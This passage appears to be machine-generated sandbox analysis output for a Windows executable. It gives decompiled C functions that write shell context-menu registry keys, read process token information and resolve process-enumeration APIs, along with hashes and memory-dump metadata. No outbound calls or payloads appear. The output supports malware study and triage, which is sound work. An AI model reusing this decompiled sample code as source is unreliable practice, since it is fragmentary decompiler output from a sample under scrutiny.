                                                                                                  0x00404547
                                                                                                  0x0040454e
                                                                                                  0x0040455b
                                                                                                  0x0040455c
                                                                                                  0x00404564
                                                                                                  0x0040456f
                                                                                                  0x00404570
                                                                                                  0x00404571
                                                                                                  0x0040457c
                                                                                                  0x0040457d
                                                                                                  0x00404588
                                                                                                  0x00404589
                                                                                                  0x0040458a
                                                                                                  0x004045a0
                                                                                                  0x004045a5
                                                                                                  0x00404521
                                                                                                  0x004044eb
                                                                                                  0x004045ab
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00404452
                                                                                                  • _snwprintf.MSVCRT ref: 00404473
                                                                                                    • Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC
                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB
                                                                                                    • Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
                                                                                                    • Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13
                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
                                                                                                  • memset.MSVCRT ref: 004044CF
                                                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                  • GetDriveTypeW.KERNEL32(?), ref: 00404518
                                                                                                  • memset.MSVCRT ref: 00404539
                                                                                                  • memset.MSVCRT ref: 0040454E
                                                                                                  • _snwprintf.MSVCRT ref: 00404571
                                                                                                  • _snwprintf.MSVCRT ref: 0040458A
                                                                                                    • Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
                                                                                                  • String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
                                                                                                  • API String ID: 486436031-734527199
                                                                                                  • Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                  • Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
                                                                                                  • Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                  • Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 87%
                                                                                                  			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
                                                                                                  				void _v530;
                                                                                                  				char _v532;
                                                                                                  				void _v1042;
                                                                                                  				long _v1044;
                                                                                                  				long _v4116;
                                                                                                  				char _v5164;
                                                                                                  				void* __edi;
                                                                                                  				void* _t27;
                                                                                                  				void* _t38;
                                                                                                  				void* _t44;
                                                                                                  
                                                                                                  				E0040B550(0x142c, __ecx);
                                                                                                  				_v1044 = 0;
                                                                                                  				memset( &_v1042, 0, 0x1fc);
                                                                                                  				_v532 = 0;
                                                                                                  				memset( &_v530, 0, 0x208);
                                                                                                  				E00404AD9( &_v532);
                                                                                                  				_pop(_t44);
                                                                                                  				E00405AA7( &_v5164);
                                                                                                  				_t27 = E0040B04D( &_v5164,  &_v532);
                                                                                                  				_t61 = _t27;
                                                                                                  				if(_t27 != 0) {
                                                                                                  					wcscpy( &_v1044,  &_v4116);
                                                                                                  					_pop(_t44);
                                                                                                  				}
                                                                                                  				wcscpy(0x40fb90, _a8);
                                                                                                  				wcscpy(0x40fda0, L"general");
                                                                                                  				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
                                                                                                  				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
                                                                                                  				E00405FAC(_t61, L"Version",  &_v1044, 1);
                                                                                                  				E00405FAC(_t61, L"RTL", "0", 0);
                                                                                                  				EnumResourceNamesW(_a4, 4, E0040620E, 0);
                                                                                                  				EnumResourceNamesW(_a4, 5, E0040620E, 0);
                                                                                                  				wcscpy(0x40fda0, L"strings");
                                                                                                  				_t38 = E00406337(_t44, _t61, _a4);
                                                                                                  				 *0x40fb90 =  *0x40fb90 & 0x00000000;
                                                                                                  				return _t38;
                                                                                                  			}













                                                                                                  0x00406466
                                                                                                  0x0040647d
                                                                                                  0x00406484
                                                                                                  0x00406499
                                                                                                  0x004064a0
                                                                                                  0x004064af
                                                                                                  0x004064b4
                                                                                                  0x004064bb
                                                                                                  0x004064cd
                                                                                                  0x004064d2
                                                                                                  0x004064d4
                                                                                                  0x004064e4
                                                                                                  0x004064ea
                                                                                                  0x004064ea
                                                                                                  0x004064f3
                                                                                                  0x00406503
                                                                                                  0x00406514
                                                                                                  0x00406525
                                                                                                  0x0040653b
                                                                                                  0x0040654e
                                                                                                  0x00406568
                                                                                                  0x00406572
                                                                                                  0x0040657a
                                                                                                  0x00406582
                                                                                                  0x0040658a
                                                                                                  0x00406596

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00406484
                                                                                                  • memset.MSVCRT ref: 004064A0
                                                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                    • Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                    • Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                    • Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                    • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                    • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                    • Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                    • Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128
                                                                                                  • wcscpy.MSVCRT ref: 004064E4
                                                                                                  • wcscpy.MSVCRT ref: 004064F3
                                                                                                  • wcscpy.MSVCRT ref: 00406503
                                                                                                  • EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
                                                                                                  • EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
                                                                                                  • wcscpy.MSVCRT ref: 0040657A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                                  • String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                  • API String ID: 3037099051-2314623505
                                                                                                  • Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                  • Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
                                                                                                  • Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                  • Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 44%
                                                                                                  			E00409A94(long _a4, intOrPtr _a8) {
                                                                                                  				int _v8;
                                                                                                  				int _v12;
                                                                                                  				int _v16;
                                                                                                  				void* _v20;
                                                                                                  				void* _v24;
                                                                                                  				char _v28;
                                                                                                  				intOrPtr _v32;
                                                                                                  				char _v36;
                                                                                                  				char _v44;
                                                                                                  				char _v52;
                                                                                                  				char _v60;
                                                                                                  				void _v315;
                                                                                                  				char _v316;
                                                                                                  				void _v826;
                                                                                                  				char _v828;
                                                                                                  				void _v1338;
                                                                                                  				char _v1340;
                                                                                                  				void* __esi;
                                                                                                  				void* _t61;
                                                                                                  				_Unknown_base(*)()* _t93;
                                                                                                  				void* _t94;
                                                                                                  				int _t106;
                                                                                                  				void* _t108;
                                                                                                  				void* _t110;
                                                                                                  
                                                                                                  				_v828 = 0;
                                                                                                  				memset( &_v826, 0, 0x1fe);
                                                                                                  				_v1340 = 0;
                                                                                                  				memset( &_v1338, 0, 0x1fe);
                                                                                                  				_t110 = _t108 + 0x18;
                                                                                                  				_t61 = OpenProcess(0x400, 0, _a4);
                                                                                                  				_t113 = _t61;
                                                                                                  				_v20 = _t61;
                                                                                                  				if(_t61 == 0) {
                                                                                                  					L11:
                                                                                                  					if(_v828 == 0) {
                                                                                                  						__eflags = 0;
                                                                                                  						return 0;
                                                                                                  					}
                                                                                                  					_push( &_v828);
                                                                                                  					_push( &_v1340);
                                                                                                  					_push(L"%s\\%s");
                                                                                                  					_push(0xff);
                                                                                                  					_push(_a8);
                                                                                                  					L0040B1EC();
                                                                                                  					return 1;
                                                                                                  				}
                                                                                                  				_v8 = 0;
                                                                                                  				_v24 = 0;
                                                                                                  				E00408F92( &_v8, _t113, _t61, 8,  &_v24);
                                                                                                  				_t106 = _v24;
                                                                                                  				if(_t106 == 0) {
                                                                                                  					_t32 =  &_v20; // 0x4059ec
                                                                                                  					E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
                                                                                                  					_v316 = 0;
                                                                                                  					memset( &_v315, 0, 0xfe);
                                                                                                  					_t110 = _t110 + 0x20;
                                                                                                  					_v16 = 0xff;
                                                                                                  					__eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
                                                                                                  					if(__eflags == 0) {
                                                                                                  						L9:
                                                                                                  						CloseHandle(_v20);
                                                                                                  						if(_v8 != 0) {
                                                                                                  							FreeLibrary(_v8);
                                                                                                  						}
                                                                                                  						goto L11;
                                                                                                  					}
                                                                                                  					_push( &_v28);
                                                                                                  					_push( &_a4);
                                                                                                  					_push( &_v1340);
                                                                                                  					_push( &_v12);
                                                                                                  					_push( &_v828);
                                                                                                  					_a4 = 0xff;
                                                                                                  					_push( &_v316);
                                                                                                  					L8:
                                                                                                  					_v12 = 0xff;
                                                                                                  					E0040906D( &_v8, _t117);
                                                                                                  					goto L9;
                                                                                                  				}
                                                                                                  				_v316 = 0;
                                                                                                  				memset( &_v315, 0, 0xff);
                                                                                                  				_v12 = _t106;
                                                                                                  				_t110 = _t110 + 0xc;
                                                                                                  				_a4 = 0;
                                                                                                  				if(E00408F72( &_v8) == 0) {
                                                                                                  					goto L9;
                                                                                                  				}
                                                                                                  				_t93 = GetProcAddress(_v8, "GetTokenInformation");
                                                                                                  				if(_t93 == 0) {
                                                                                                  					goto L9;
                                                                                                  				}
                                                                                                  				_t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);
                                                                                                  				_t117 = _t94;
                                                                                                  				if(_t94 == 0) {
                                                                                                  					goto L9;
                                                                                                  				}
                                                                                                  				_push( &_v28);
                                                                                                  				_push( &_v12);
                                                                                                  				_push( &_v1340);
                                                                                                  				_push( &_v16);
                                                                                                  				_push( &_v828);
                                                                                                  				_push(_v316);
                                                                                                  				_v16 = 0xff;
                                                                                                  				goto L8;
                                                                                                  			}



























                                                                                                  0x00409ab0
                                                                                                  0x00409ab7
                                                                                                  0x00409ac8
                                                                                                  0x00409acf
                                                                                                  0x00409ad4
                                                                                                  0x00409ae0
                                                                                                  0x00409ae6
                                                                                                  0x00409ae8
                                                                                                  0x00409af0
                                                                                                  0x00409c3a
                                                                                                  0x00409c41
                                                                                                  0x00409c67
                                                                                                  0x00000000
                                                                                                  0x00409c67
                                                                                                  0x00409c49
                                                                                                  0x00409c50
                                                                                                  0x00409c51
                                                                                                  0x00409c56
                                                                                                  0x00409c57
                                                                                                  0x00409c5a
                                                                                                  0x00000000
                                                                                                  0x00409c64
                                                                                                  0x00409b00
                                                                                                  0x00409b03
                                                                                                  0x00409b06
                                                                                                  0x00409b0b
                                                                                                  0x00409b10
                                                                                                  0x00409ba9
                                                                                                  0x00409bac
                                                                                                  0x00409bc1
                                                                                                  0x00409bc7
                                                                                                  0x00409bcc
                                                                                                  0x00409bd8
                                                                                                  0x00409bf0
                                                                                                  0x00409bf2
                                                                                                  0x00409c23
                                                                                                  0x00409c26
                                                                                                  0x00409c2f
                                                                                                  0x00409c34
                                                                                                  0x00409c34
                                                                                                  0x00000000
                                                                                                  0x00409c2f
                                                                                                  0x00409bf7
                                                                                                  0x00409bfb
                                                                                                  0x00409c02
                                                                                                  0x00409c06
                                                                                                  0x00409c0d
                                                                                                  0x00409c14
                                                                                                  0x00409c17
                                                                                                  0x00409c18
                                                                                                  0x00409c1b
                                                                                                  0x00409c1e
                                                                                                  0x00000000
                                                                                                  0x00409c1e
                                                                                                  0x00409b1f
                                                                                                  0x00409b25
                                                                                                  0x00409b2a
                                                                                                  0x00409b2d
                                                                                                  0x00409b33
                                                                                                  0x00409b3d
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00409b4b
                                                                                                  0x00409b53
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00409b6a
                                                                                                  0x00409b6c
                                                                                                  0x00409b6e
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00409b77
                                                                                                  0x00409b7b
                                                                                                  0x00409b82
                                                                                                  0x00409b86
                                                                                                  0x00409b8d
                                                                                                  0x00409b8e
                                                                                                  0x00409b94
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00409AB7
                                                                                                  • memset.MSVCRT ref: 00409ACF
                                                                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                  • _snwprintf.MSVCRT ref: 00409C5A
                                                                                                    • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                  • memset.MSVCRT ref: 00409B25
                                                                                                  • GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                  • memset.MSVCRT ref: 00409BC7
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
                                                                                                  • String ID: %s\%s$GetTokenInformation$Y@
                                                                                                  • API String ID: 3504373036-27875219
                                                                                                  • Opcode ID: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                  • Instruction ID: eda2fbc970d96949daa6443d9737cdff9b2c135ab99c7c98679ff10ae30762ca
                                                                                                  • Opcode Fuzzy Hash: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                  • Instruction Fuzzy Hash: E451C9B2C0021DBADB51EB95DC81DEFBBBDEB44344F1045BAB505B2191EA349F84CBA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00409172() {
                                                                                                  				void* _t1;
                                                                                                  				int _t2;
                                                                                                  				struct HINSTANCE__* _t5;
                                                                                                  
                                                                                                  				if( *0x4101bc != 0) {
                                                                                                  					return _t1;
                                                                                                  				}
                                                                                                  				_t2 = E00405436(L"psapi.dll");
                                                                                                  				_t5 = _t2;
                                                                                                  				if(_t5 == 0) {
                                                                                                  					L10:
                                                                                                  					return _t2;
                                                                                                  				} else {
                                                                                                  					_t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
                                                                                                  					 *0x40f848 = _t2;
                                                                                                  					if(_t2 != 0) {
                                                                                                  						_t2 = GetProcAddress(_t5, "EnumProcessModules");
                                                                                                  						 *0x40f840 = _t2;
                                                                                                  						if(_t2 != 0) {
                                                                                                  							_t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
                                                                                                  							 *0x40f838 = _t2;
                                                                                                  							if(_t2 != 0) {
                                                                                                  								_t2 = GetProcAddress(_t5, "EnumProcesses");
                                                                                                  								 *0x40fa6c = _t2;
                                                                                                  								if(_t2 != 0) {
                                                                                                  									_t2 = GetProcAddress(_t5, "GetModuleInformation");
                                                                                                  									 *0x40f844 = _t2;
                                                                                                  									if(_t2 != 0) {
                                                                                                  										 *0x4101bc = 1;
                                                                                                  									}
                                                                                                  								}
                                                                                                  							}
                                                                                                  						}
                                                                                                  					}
                                                                                                  					if( *0x4101bc == 0) {
                                                                                                  						_t2 = FreeLibrary(_t5);
                                                                                                  					}
                                                                                                  					goto L10;
                                                                                                  				}
                                                                                                  			}






                                                                                                  0x00409179
                                                                                                  0x00409209
                                                                                                  0x00409209
                                                                                                  0x00409185
                                                                                                  0x0040918a
                                                                                                  0x0040918f
                                                                                                  0x00409208
                                                                                                  0x00000000
                                                                                                  0x00409191
                                                                                                  0x0040919e
                                                                                                  0x004091a2
                                                                                                  0x004091a7
                                                                                                  0x004091af
                                                                                                  0x004091b3
                                                                                                  0x004091b8
                                                                                                  0x004091c0
                                                                                                  0x004091c4
                                                                                                  0x004091c9
                                                                                                  0x004091d1
                                                                                                  0x004091d5
                                                                                                  0x004091da
                                                                                                  0x004091e2
                                                                                                  0x004091e6
                                                                                                  0x004091eb
                                                                                                  0x004091ed
                                                                                                  0x004091ed
                                                                                                  0x004091eb
                                                                                                  0x004091da
                                                                                                  0x004091c9
                                                                                                  0x004091b8
                                                                                                  0x004091ff
                                                                                                  0x00409202
                                                                                                  0x00409202
                                                                                                  0x00000000
                                                                                                  0x004091ff

                                                                                                  APIs
                                                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040919E
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00409202
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$Library$Load$Freememsetwcscat
                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                  • API String ID: 1182944575-70141382
                                                                                                  • Opcode ID: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                  • Instruction ID: e8d56a808bd010e6a3fef0dff4ae07571f85a6d4972d2e5c8a67e4e39b9e152a
                                                                                                  • Opcode Fuzzy Hash: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                  • Instruction Fuzzy Hash: 33017175A41207BAD7205B656D88FB739E49B91B51B14413FE404F12D2DB7C88459F2C
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004090EE() {
                                                                                                  				void* _t1;
                                                                                                  				_Unknown_base(*)()* _t2;
                                                                                                  				struct HINSTANCE__* _t4;
                                                                                                  
                                                                                                  				if( *0x4101b8 != 0) {
                                                                                                  					return _t1;
                                                                                                  				}
                                                                                                  				_t2 = GetModuleHandleW(L"kernel32.dll");
                                                                                                  				_t4 = _t2;
                                                                                                  				if(_t4 == 0) {
                                                                                                  					L9:
                                                                                                  					return _t2;
                                                                                                  				}
                                                                                                  				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
                                                                                                  				 *0x40f83c = _t2;
                                                                                                  				if(_t2 != 0) {
                                                                                                  					_t2 = GetProcAddress(_t4, "Module32First");
                                                                                                  					 *0x40f834 = _t2;
                                                                                                  					if(_t2 != 0) {
                                                                                                  						_t2 = GetProcAddress(_t4, "Module32Next");
                                                                                                  						 *0x40f830 = _t2;
                                                                                                  						if(_t2 != 0) {
                                                                                                  							_t2 = GetProcAddress(_t4, "Process32First");
                                                                                                  							 *0x40f5c4 = _t2;
                                                                                                  							if(_t2 != 0) {
                                                                                                  								_t2 = GetProcAddress(_t4, "Process32Next");
                                                                                                  								 *0x40f828 = _t2;
                                                                                                  								if(_t2 != 0) {
                                                                                                  									 *0x4101b8 = 1;
                                                                                                  								}
                                                                                                  							}
                                                                                                  						}
                                                                                                  					}
                                                                                                  				}
                                                                                                  				goto L9;
                                                                                                  			}






                                                                                                  0x004090f5
                                                                                                  0x00409171
                                                                                                  0x00409171
                                                                                                  0x004090fd
                                                                                                  0x00409103
                                                                                                  0x00409107
                                                                                                  0x00409170
                                                                                                  0x00000000
                                                                                                  0x00409170
                                                                                                  0x00409116
                                                                                                  0x0040911a
                                                                                                  0x0040911f
                                                                                                  0x00409127
                                                                                                  0x0040912b
                                                                                                  0x00409130
                                                                                                  0x00409138
                                                                                                  0x0040913c
                                                                                                  0x00409141
                                                                                                  0x00409149
                                                                                                  0x0040914d
                                                                                                  0x00409152
                                                                                                  0x0040915a
                                                                                                  0x0040915e
                                                                                                  0x00409163
                                                                                                  0x00409165
                                                                                                  0x00409165
                                                                                                  0x00409163
                                                                                                  0x00409152
                                                                                                  0x00409141
                                                                                                  0x00409130
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409116
                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                  • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                  • API String ID: 667068680-3953557276
                                                                                                  • Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                  • Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
                                                                                                  • Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                  • Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 56%
                                                                                                  			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
                                                                                                  				void _v514;
                                                                                                  				char _v516;
                                                                                                  				void _v1026;
                                                                                                  				char _v1028;
                                                                                                  				void _v1538;
                                                                                                  				char _v1540;
                                                                                                  				void* _t39;
                                                                                                  				intOrPtr* _t50;
                                                                                                  				void* _t61;
                                                                                                  
                                                                                                  				_t50 = __ecx;
                                                                                                  				_push(0x1fe);
                                                                                                  				_push(0);
                                                                                                  				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                                                                                  					_v1540 = 0;
                                                                                                  					memset( &_v1538, ??, ??);
                                                                                                  					_v1028 = 0;
                                                                                                  					memset( &_v1026, 0, 0x1fe);
                                                                                                  					_v516 = 0;
                                                                                                  					memset( &_v514, 0, 0x1fe);
                                                                                                  					L0040B1EC();
                                                                                                  					 *((long long*)(_t61 + 0x2c)) = _a16;
                                                                                                  					L0040B1EC();
                                                                                                  					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
                                                                                                  					if (_t39 != 0) goto L3;
                                                                                                  					return _t39;
                                                                                                  				}
                                                                                                  				_v516 = 0;
                                                                                                  				memset( &_v514, ??, ??);
                                                                                                  				_v1028 = 0;
                                                                                                  				memset( &_v1026, 0, 0x1fe);
                                                                                                  				L0040B1EC();
                                                                                                  				 *((long long*)(_t61 + 0x20)) =  *_a12;
                                                                                                  				L0040B1EC();
                                                                                                  				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
                                                                                                  			}












                                                                                                  0x00409faf
                                                                                                  0x00409fb4
                                                                                                  0x00409fb5
                                                                                                  0x00409fb6
                                                                                                  0x0040a043
                                                                                                  0x0040a04a
                                                                                                  0x0040a058
                                                                                                  0x0040a05f
                                                                                                  0x0040a06d
                                                                                                  0x0040a074
                                                                                                  0x0040a08e
                                                                                                  0x0040a099
                                                                                                  0x0040a0ab
                                                                                                  0x0040a0c9
                                                                                                  0x0040a0ce
                                                                                                  0x00000000
                                                                                                  0x0040a0ce
                                                                                                  0x00409fc3
                                                                                                  0x00409fca
                                                                                                  0x00409fd8
                                                                                                  0x00409fdf
                                                                                                  0x00409ff9
                                                                                                  0x0040a006
                                                                                                  0x0040a018
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memset$_snwprintf
                                                                                                  • String ID: %%0.%df
                                                                                                  • API String ID: 3473751417-763548558
